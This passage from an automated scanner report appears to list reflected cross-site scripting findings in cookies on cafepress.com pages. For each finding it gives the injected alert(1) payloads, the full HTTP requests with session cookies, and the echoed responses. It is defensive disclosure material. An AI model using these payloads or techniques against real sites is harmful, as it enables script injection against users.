__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 ntCoent-Length: 41343 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41343 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/cp/addtocart.aspx' window.cafepress.tealeaf.searchTerm = '4a79f</script><script>alert(1)</script>f30bd18751f ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4954"-alert(1)-"ab20618713b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 46269 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d2b</script><script>alert(1)</script>e9999fa4cb2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=55d2b</script><script>alert(1)</script>e9999fa4cb2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 46295 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46295 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... .com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/about/index.aspx' window.cafepress.tealeaf.searchTerm = '55d2b</script><script>alert(1)</script>e9999fa4cb2 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe61"-alert(1)-"a4da02b5a1a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58704 Date: Sun, 26 Dec 2010 13:46:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58704 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1161</script><script>alert(1)</script>2e613423535 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1161</script><script>alert(1)</script>2e613423535 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58725 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58725 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'f1161</script><script>alert(1)</script>2e613423535 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/tos.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d434d"-alert(1)-"e31525dd84b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 60935 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60935 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/tos.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc886</script><script>alert(1)</script>e31d106e7a6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
